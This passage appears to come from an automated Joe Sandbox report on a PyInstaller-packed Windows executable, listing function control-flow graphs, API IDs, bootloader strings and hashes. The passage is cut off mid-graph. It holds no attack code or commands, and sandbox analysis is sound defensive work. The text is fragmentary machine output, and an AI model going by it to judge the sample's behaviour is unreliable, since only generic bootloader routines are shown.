_invalid_parameter_noinfo 22776->22790 22785 7ff7f3de565a 22777->22785 22778->22785 22793 7ff7f3de4e7c 11 API calls 2 library calls 22779->22793 22794 7ff7f3de59c4 51 API calls 22780->22794 22784 7ff7f3de571d 22795 7ff7f3de5b00 21 API calls _fread_nolock 22784->22795 22787 7ff7f3de56ef 22787->22785 22788->22770 22789->22776 22790->22785 22791->22774 22792->22775 22793->22787 22794->22784 22795->22787 22881 7ff7f3ddda28 45 API calls 22820 7ffe126d1ac0 14 API calls __CxxDetectRethrow

                                                                                      Executed Functions

                                                                                      Function 00007FF7F3DD1000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 7ff7f3dd1000-7ff7f3dd3806 call 7ff7f3ddfe18 call 7ff7f3ddfe20 call 7ff7f3ddc850 call 7ff7f3de53f0 call 7ff7f3de5484 call 7ff7f3dd36b0 14 7ff7f3dd3814-7ff7f3dd3836 call 7ff7f3dd1950 0->14 15 7ff7f3dd3808-7ff7f3dd380f 0->15 21 7ff7f3dd391b-7ff7f3dd3931 call 7ff7f3dd45c0 14->21 22 7ff7f3dd383c-7ff7f3dd3856 call 7ff7f3dd1c80 14->22 16 7ff7f3dd3c97-7ff7f3dd3cb2 call 7ff7f3ddc550 15->16 27 7ff7f3dd3933-7ff7f3dd3960 call 7ff7f3dd7f90 21->27 28 7ff7f3dd396a-7ff7f3dd397f call 7ff7f3dd2710 21->28 26 7ff7f3dd385b-7ff7f3dd389b call 7ff7f3dd8830 22->26 33 7ff7f3dd38c1-7ff7f3dd38cc call 7ff7f3de4f30 26->33 34 7ff7f3dd389d-7ff7f3dd38a3 26->34 40 7ff7f3dd3984-7ff7f3dd39a6 call 7ff7f3dd1c80 27->40 41 7ff7f3dd3962-7ff7f3dd3965 call 7ff7f3de004c 27->41 42 7ff7f3dd3c8f 28->42 48 7ff7f3dd38d2-7ff7f3dd38e1 call 7ff7f3dd8830 33->48 49 7ff7f3dd39fc-7ff7f3dd3a2a call 7ff7f3dd8940 call 7ff7f3dd89a0 * 3 33->49 37 7ff7f3dd38a5-7ff7f3dd38ad 34->37 38 7ff7f3dd38af-7ff7f3dd38bd call 7ff7f3dd89a0 34->38 37->38 38->33 51 7ff7f3dd39b0-7ff7f3dd39b9 40->51 41->28 42->16 58 7ff7f3dd39f4-7ff7f3dd39f7 call 7ff7f3de4f30 48->58 59 7ff7f3dd38e7-7ff7f3dd38ed 48->59 76 7ff7f3dd3a2f-7ff7f3dd3a3e call 7ff7f3dd8830 49->76 51->51 54 7ff7f3dd39bb-7ff7f3dd39d8 call 7ff7f3dd1950 51->54 54->26 65 7ff7f3dd39de-7ff7f3dd39ef call 7ff7f3dd2710 54->65 58->49 63 7ff7f3dd38f0-7ff7f3dd38fc 59->63 66 7ff7f3dd3905-7ff7f3dd3908 63->66 67 7ff7f3dd38fe-7ff7f3dd3903 63->67 65->42 66->58 70 7ff7f3dd390e-7ff7f3dd3916 call 7ff7f3de4f30 66->70 67->63 67->66 70->76 79 7ff7f3dd3a44-7ff7f3dd3a47 76->79 80 7ff7f3dd3b45-7ff7f3dd3b53 76->80 79->80 81 7ff7f3dd3a4d-7ff7f3dd3a50 79->81 82 7ff7f3dd3a67 80->82 83 7ff7f3dd3b59-7ff7f3dd3b5d 80->83 84 7ff7f3dd3b14-7ff7f3dd3b17 81->84 85 7ff7f3dd3a56-7ff7f3dd3a5a 81->85 86 7ff7f3dd3a6b-7ff7f3dd3a90 call 7ff7f3de4f30 82->86 83->86 88 7ff7f3dd3b2f-7ff7f3dd3b40 call 7ff7f3dd2710 84->88 89 7ff7f3dd3b19-7ff7f3dd3b1d 84->89 85->84 87 7ff7f3dd3a60 85->87 95 7ff7f3dd3a92-7ff7f3dd3aa6 call 7ff7f3dd8940 86->95 96 7ff7f3dd3aab-7ff7f3dd3ac0 86->96 87->82 97 7ff7f3dd3c7f-7ff7f3dd3c87 88->97 89->88 91 7ff7f3dd3b1f-7ff7f3dd3b2a 89->91 91->86 95->96 99 7ff7f3dd3ac6-7ff7f3dd3aca 96->99 100 7ff7f3dd3be8-7ff7f3dd3bfa call 7ff7f3dd8830 96->100 97->42 101 7ff7f3dd3ad0-7ff7f3dd3ae8 call 7ff7f3de5250 99->101 102 7ff7f3dd3bcd-7ff7f3dd3be2 call 7ff7f3dd1940 99->102 107 7ff7f3dd3bfc-7ff7f3dd3c02 100->107 108 7ff7f3dd3c2e 100->108 113 7ff7f3dd3b62-7ff7f3dd3b7a call 7ff7f3de5250 101->113 114 7ff7f3dd3aea-7ff7f3dd3b02 call 7ff7f3de5250 101->114 102->99 102->100 111 7ff7f3dd3c04-7ff7f3dd3c1c 107->111 112 7ff7f3dd3c1e-7ff7f3dd3c2c 107->112 115 7ff7f3dd3c31-7ff7f3dd3c40 call 7ff7f3de4f30 108->115 111->115 112->115 122 7ff7f3dd3b7c-7ff7f3dd3b80 113->122 123 7ff7f3dd3b87-7ff7f3dd3b9f call 7ff7f3de5250 113->123 114->102 124 7ff7f3dd3b08-7ff7f3dd3b0f 114->124 125 7ff7f3dd3c46-7ff7f3dd3c4a 115->125 126 7ff7f3dd3d41-7ff7f3dd3d63 call 7ff7f3dd44e0 115->126 122->123 135 7ff7f3dd3ba1-7ff7f3dd3ba5 123->135 136 7ff7f3dd3bac-7ff7f3dd3bc4 call 7ff7f3de5250 123->136 124->102 128 7ff7f3dd3cd4-7ff7f3dd3ce6 call 7ff7f3dd8830 125->128 129 7ff7f3dd3c50-7ff7f3dd3c5f call 7ff7f3dd90e0 125->129 139 7ff7f3dd3d65-7ff7f3dd3d6f call 7ff7f3dd4630 126->139 140 7ff7f3dd3d71-7ff7f3dd3d82 call 7ff7f3dd1c80 126->140 145 7ff7f3dd3d35-7ff7f3dd3d3c 128->145 146 7ff7f3dd3ce8-7ff7f3dd3ceb 128->146 143 7ff7f3dd3cb3-7ff7f3dd3cbd call 7ff7f3dd8660 129->143 144 7ff7f3dd3c61 129->144 135->136 136->102 157 7ff7f3dd3bc6 136->157 148 7ff7f3dd3d87-7ff7f3dd3d96 139->148 140->148 163 7ff7f3dd3cbf-7ff7f3dd3cc6 143->163 164 7ff7f3dd3cc8-7ff7f3dd3ccf 143->164 151 7ff7f3dd3c68 call 7ff7f3dd2710 144->151 145->151 146->145 152 7ff7f3dd3ced-7ff7f3dd3d10 call 7ff7f3dd1c80 146->152 154 7ff7f3dd3dbc-7ff7f3dd3dd2 call 7ff7f3dd9390 148->154 155 7ff7f3dd3d98-7ff7f3dd3d9f 148->155 165 7ff7f3dd3c6d-7ff7f3dd3c77 151->165 166 7ff7f3dd3d12-7ff7f3dd3d26 call 7ff7f3dd2710 call 7ff7f3de4f30 152->166 167 7ff7f3dd3d2b-7ff7f3dd3d33 call 7ff7f3de4f30 152->167 172 7ff7f3dd3dd4 154->172 173 7ff7f3dd3de0-7ff7f3dd3dfc SetDllDirectoryW 154->173 155->154 161 7ff7f3dd3da1-7ff7f3dd3da5 155->161 157->102 161->154 168 7ff7f3dd3da7-7ff7f3dd3db6 LoadLibraryExW 161->168 163->151 164->148 165->97 166->165 167->148 168->154 172->173 176 7ff7f3dd3e02-7ff7f3dd3e11 call 7ff7f3dd8830 173->176 177 7ff7f3dd3ef9-7ff7f3dd3f00 173->177 189 7ff7f3dd3e13-7ff7f3dd3e19 176->189 190 7ff7f3dd3e2a-7ff7f3dd3e34 call 7ff7f3de4f30 176->190 179 7ff7f3dd3f06-7ff7f3dd3f0d 177->179 180 7ff7f3dd4000-7ff7f3dd4008 177->180 179->180 183 7ff7f3dd3f13-7ff7f3dd3f1d call 7ff7f3dd33c0 179->183 184 7ff7f3dd402d-7ff7f3dd4038 call 7ff7f3dd36a0 call 7ff7f3dd3360 180->184 185 7ff7f3dd400a-7ff7f3dd4027 PostMessageW GetMessageW 180->185 183->165 197 7ff7f3dd3f23-7ff7f3dd3f37 call 7ff7f3dd90c0 183->197 199 7ff7f3dd403d-7ff7f3dd405f call 7ff7f3dd3670 call 7ff7f3dd6fc0 call 7ff7f3dd6d70 184->199 185->184 191 7ff7f3dd3e25-7ff7f3dd3e27 189->191 192 7ff7f3dd3e1b-7ff7f3dd3e23 189->192 200 7ff7f3dd3eea-7ff7f3dd3ef4 call 7ff7f3dd8940 190->200 201 7ff7f3dd3e3a-7ff7f3dd3e40 190->201 191->190 192->191 210 7ff7f3dd3f5c-7ff7f3dd3f9f call 7ff7f3dd8940 call 7ff7f3dd89e0 call 7ff7f3dd6fc0 call 7ff7f3dd6d70 call 7ff7f3dd88e0 197->210 211 7ff7f3dd3f39-7ff7f3dd3f56 PostMessageW GetMessageW 197->211 200->177 201->200 205 7ff7f3dd3e46-7ff7f3dd3e4c 201->205 208 7ff7f3dd3e4e-7ff7f3dd3e50 205->208 209 7ff7f3dd3e57-7ff7f3dd3e59 205->209 214 7ff7f3dd3e5f-7ff7f3dd3e7b call 7ff7f3dd6dc0 call 7ff7f3dd7340 208->214 215 7ff7f3dd3e52 208->215 209->177 209->214 249 7ff7f3dd3fa1-7ff7f3dd3fb7 call 7ff7f3dd8ed0 call 7ff7f3dd88e0 210->249 250 7ff7f3dd3fed-7ff7f3dd3ffb call 7ff7f3dd1900 210->250 211->210 228 7ff7f3dd3e86-7ff7f3dd3e8d 214->228 229 7ff7f3dd3e7d-7ff7f3dd3e84 214->229 215->177 231 7ff7f3dd3e8f-7ff7f3dd3e9c call 7ff7f3dd6e00 228->231 232 7ff7f3dd3ea7-7ff7f3dd3eb1 call 7ff7f3dd71b0 228->232 230 7ff7f3dd3ed3-7ff7f3dd3ee8 call 7ff7f3dd2a50 call 7ff7f3dd6fc0 call 7ff7f3dd6d70 229->230 230->177 231->232 243 7ff7f3dd3e9e-7ff7f3dd3ea5 231->243 244 7ff7f3dd3eb3-7ff7f3dd3eba 232->244 245 7ff7f3dd3ebc-7ff7f3dd3eca call 7ff7f3dd74f0 232->245 243->230 244->230 245->177 257 7ff7f3dd3ecc 245->257 249->250 261 7ff7f3dd3fb9-7ff7f3dd3fce 249->261 250->165 257->230 262 7ff7f3dd3fd0-7ff7f3dd3fe3 call 7ff7f3dd2710 call 7ff7f3dd1900 261->262 263 7ff7f3dd3fe8 call 7ff7f3dd2a50 261->263 262->165 263->250
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastModuleName
                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                      • API String ID: 2776309574-4232158417
                                                                                      • Opcode ID: b5ceb5b3e51986f255ddba2ad990e8dc75569a57b07797df16117ed6fd5ba839
                                                                                      • Instruction ID: 4fb2ea448d07d9a1701d28de9040923eedc43dd41333b3bd64cbd30ff9cca828
                                                                                      • Opcode Fuzzy Hash: b5ceb5b3e51986f255ddba2ad990e8dc75569a57b07797df16117ed6fd5ba839
                                                                                      • Instruction Fuzzy Hash: 7C32AE21A0C68291FB99B7B4D4543B9F761AF44780FC44132DA7E6B2D6DF2CE568C3A0
                                                                                      Function 00007FF7F3DF6964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 477 7ff7f3df6964-7ff7f3df69d7 call 7ff7f3df6698 480 7ff7f3df69f1-7ff7f3df69fb call 7ff7f3de8520 477->480 481 7ff7f3df69d9-7ff7f3df69e2 call 7ff7f3de4ee8 477->481 486 7ff7f3df6a16-7ff7f3df6a7f CreateFileW 480->486 487 7ff7f3df69fd-7ff7f3df6a14 call 7ff7f3de4ee8 call 7ff7f3de4f08 480->487 488 7ff7f3df69e5-7ff7f3df69ec call 7ff7f3de4f08 481->488 490 7ff7f3df6a81-7ff7f3df6a87 486->490 491 7ff7f3df6afc-7ff7f3df6b07 GetFileType 486->491 487->488 499 7ff7f3df6d32-7ff7f3df6d52 488->499 497 7ff7f3df6ac9-7ff7f3df6af7 GetLastError call 7ff7f3de4e7c 490->497 498 7ff7f3df6a89-7ff7f3df6a8d 490->498 494 7ff7f3df6b09-7ff7f3df6b44 GetLastError call 7ff7f3de4e7c CloseHandle 491->494 495 7ff7f3df6b5a-7ff7f3df6b61 491->495 494->488 511 7ff7f3df6b4a-7ff7f3df6b55 call 7ff7f3de4f08 494->511 502 7ff7f3df6b63-7ff7f3df6b67 495->502 503 7ff7f3df6b69-7ff7f3df6b6c 495->503 497->488 498->497 504 7ff7f3df6a8f-7ff7f3df6ac7 CreateFileW 498->504 508 7ff7f3df6b72-7ff7f3df6bc7 call 7ff7f3de8438 502->508 503->508 509 7ff7f3df6b6e 503->509 504->491 504->497 516 7ff7f3df6be6-7ff7f3df6c17 call 7ff7f3df6418 508->516 517 7ff7f3df6bc9-7ff7f3df6bd5 call 7ff7f3df68a0 508->517 509->508 511->488 523 7ff7f3df6c1d-7ff7f3df6c5f 516->523 524 7ff7f3df6c19-7ff7f3df6c1b 516->524 517->516 522 7ff7f3df6bd7 517->522 525 7ff7f3df6bd9-7ff7f3df6be1 call 7ff7f3deaac0 522->525 526 7ff7f3df6c81-7ff7f3df6c8c 523->526 527 7ff7f3df6c61-7ff7f3df6c65 523->527 524->525 525->499 530 7ff7f3df6c92-7ff7f3df6c96 526->530 531 7ff7f3df6d30 526->531 527->526 529 7ff7f3df6c67-7ff7f3df6c7c 527->529 529->526 530->531 533 7ff7f3df6c9c-7ff7f3df6ce1 CloseHandle CreateFileW 530->533 531->499 534 7ff7f3df6d16-7ff7f3df6d2b 533->534 535 7ff7f3df6ce3-7ff7f3df6d11 GetLastError call 7ff7f3de4e7c call 7ff7f3de8660 533->535 534->531 535->534
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                      • String ID:
                                                                                      • API String ID: 1617910340-0
                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                      • Instruction ID: 6869748603e4a58de962c456635117745c60ba011b704a3eb74383bd1e551039
                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                      • Instruction Fuzzy Hash: 46C1B132B28A4285EB50EFB5C4912AC7765FB49B98B814235DE3E6B7D8CF38D055C390
                                                                                      Function 00007FF7F3DD9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                      • Instruction ID: a7ca895c0948d9ab81e47e3977dfa6b0a6a0bd7d763ff6a410496da1bd87aec7
                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                      • Instruction Fuzzy Hash: 22F0C862A1974186F7E0AFE0B489766B350EB84368F840335DA7E1A6D4DF3CD149CB40
                                                                                      Function 00007FF7F3DD1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 269 7ff7f3dd1950-7ff7f3dd198b call 7ff7f3dd45c0 272 7ff7f3dd1991-7ff7f3dd19d1 call 7ff7f3dd7f90 269->272 273 7ff7f3dd1c4e-7ff7f3dd1c72 call 7ff7f3ddc550 269->273 278 7ff7f3dd1c3b-7ff7f3dd1c3e call 7ff7f3de004c 272->278 279 7ff7f3dd19d7-7ff7f3dd19e7 call 7ff7f3de06d4 272->279 282 7ff7f3dd1c43-7ff7f3dd1c4b 278->282 284 7ff7f3dd1a08-7ff7f3dd1a24 call 7ff7f3de039c 279->284 285 7ff7f3dd19e9-7ff7f3dd1a03 call 7ff7f3de4f08 call 7ff7f3dd2910 279->285 282->273 291 7ff7f3dd1a45-7ff7f3dd1a5a call 7ff7f3de4f28 284->291 292 7ff7f3dd1a26-7ff7f3dd1a40 call 7ff7f3de4f08 call 7ff7f3dd2910 284->292 285->278 299 7ff7f3dd1a7b-7ff7f3dd1afc call 7ff7f3dd1c80 * 2 call 7ff7f3de06d4 291->299 300 7ff7f3dd1a5c-7ff7f3dd1a76 call 7ff7f3de4f08 call 7ff7f3dd2910 291->300 292->278 311 7ff7f3dd1b01-7ff7f3dd1b14 call 7ff7f3de4f44 299->311 300->278 314 7ff7f3dd1b35-7ff7f3dd1b4e call 7ff7f3de039c 311->314 315 7ff7f3dd1b16-7ff7f3dd1b30 call 7ff7f3de4f08 call 7ff7f3dd2910 311->315 321 7ff7f3dd1b6f-7ff7f3dd1b8b call 7ff7f3de0110 314->321 322 7ff7f3dd1b50-7ff7f3dd1b6a call 7ff7f3de4f08 call 7ff7f3dd2910 314->322 315->278 329 7ff7f3dd1b8d-7ff7f3dd1b99 call 7ff7f3dd2710 321->329 330 7ff7f3dd1b9e-7ff7f3dd1bac 321->330 322->278 329->278 330->278 331 7ff7f3dd1bb2-7ff7f3dd1bb9 330->331 334 7ff7f3dd1bc1-7ff7f3dd1bc7 331->334 336 7ff7f3dd1be0-7ff7f3dd1bef 334->336 337 7ff7f3dd1bc9-7ff7f3dd1bd6 334->337 336->336 338 7ff7f3dd1bf1-7ff7f3dd1bfa 336->338 337->338 339 7ff7f3dd1c0f 338->339 340 7ff7f3dd1bfc-7ff7f3dd1bff 338->340 342 7ff7f3dd1c11-7ff7f3dd1c24 339->342 340->339 341 7ff7f3dd1c01-7ff7f3dd1c04 340->341 341->339 343 7ff7f3dd1c06-7ff7f3dd1c09 341->343 344 7ff7f3dd1c26 342->344 345 7ff7f3dd1c2d-7ff7f3dd1c39 342->345 343->339 346 7ff7f3dd1c0b-7ff7f3dd1c0d 343->346 344->345 345->278 345->334 346->342
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD7F90: _fread_nolock.LIBCMT ref: 00007FF7F3DD803A
                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7F3DD1A1B
                                                                                        • Part of subcall function 00007FF7F3DD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                      • API String ID: 2397952137-3497178890
                                                                                      • Opcode ID: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
                                                                                      • Instruction ID: c0abb39bb4e068bbccd6192fcc26d7cc6bf6f57499df95413ff2afa3bbc1c1a6
                                                                                      • Opcode Fuzzy Hash: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
                                                                                      • Instruction Fuzzy Hash: C9819271A0D68385EBE0EBA4D0412B9B3A4FF48744F844531E9AD6B7C9DE3CE58587A0
                                                                                      Function 00007FF7F3DD2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                      • String ID: P%
                                                                                      • API String ID: 2147705588-2959514604
                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                      • Instruction ID: 8e49502afe0649f0e048a1c0c177276a1f758f142f0379655705d5355395b2fc
                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                      • Instruction Fuzzy Hash: B2510626608BA186D7749F36A4581BAF7A1FB98B65F004131EFEE47694DF3CD085CB20
                                                                                      Function 00007FF7F3DD1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      • Opcode ID: 0415811bb7329ddca4e4a244178c4befdf0ff72a6341d4c7f046017dd740e2c3
                                                                                      • Instruction ID: 1707ef3a49e271e07163ff1ddbfb7564dd7ab755d4cf15c5305be77f46131eea
                                                                                      • Opcode Fuzzy Hash: 0415811bb7329ddca4e4a244178c4befdf0ff72a6341d4c7f046017dd740e2c3
                                                                                      • Instruction Fuzzy Hash: AE418D21A0864386EB90EBA1A4412B9F3A4EF44784FC44532ED6D2BBD9DE3CE541C7A1
                                                                                      Function 00007FF7F3DD1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 540 7ff7f3dd1210-7ff7f3dd126d call 7ff7f3ddbd80 543 7ff7f3dd126f-7ff7f3dd1296 call 7ff7f3dd2710 540->543 544 7ff7f3dd1297-7ff7f3dd12af call 7ff7f3de4f44 540->544 549 7ff7f3dd12d4-7ff7f3dd12e4 call 7ff7f3de4f44 544->549 550 7ff7f3dd12b1-7ff7f3dd12cf call 7ff7f3de4f08 call 7ff7f3dd2910 544->550 556 7ff7f3dd12e6-7ff7f3dd1304 call 7ff7f3de4f08 call 7ff7f3dd2910 549->556 557 7ff7f3dd1309-7ff7f3dd131b 549->557 561 7ff7f3dd1439-7ff7f3dd146d call 7ff7f3ddba60 call 7ff7f3de4f30 * 2 550->561 556->561 560 7ff7f3dd1320-7ff7f3dd1345 call 7ff7f3de039c 557->560 567 7ff7f3dd1431 560->567 568 7ff7f3dd134b-7ff7f3dd1355 call 7ff7f3de0110 560->568 567->561 568->567 576 7ff7f3dd135b-7ff7f3dd1367 568->576 578 7ff7f3dd1370-7ff7f3dd1398 call 7ff7f3dda1c0 576->578 581 7ff7f3dd1416-7ff7f3dd142c call 7ff7f3dd2710 578->581 582 7ff7f3dd139a-7ff7f3dd139d 578->582 581->567 583 7ff7f3dd139f-7ff7f3dd13a9 582->583 584 7ff7f3dd1411 582->584 586 7ff7f3dd13d4-7ff7f3dd13d7 583->586 587 7ff7f3dd13ab-7ff7f3dd13b9 call 7ff7f3de0adc 583->587 584->581 588 7ff7f3dd13d9-7ff7f3dd13e7 call 7ff7f3df9e30 586->588 589 7ff7f3dd13ea-7ff7f3dd13ef 586->589 593 7ff7f3dd13be-7ff7f3dd13c1 587->593 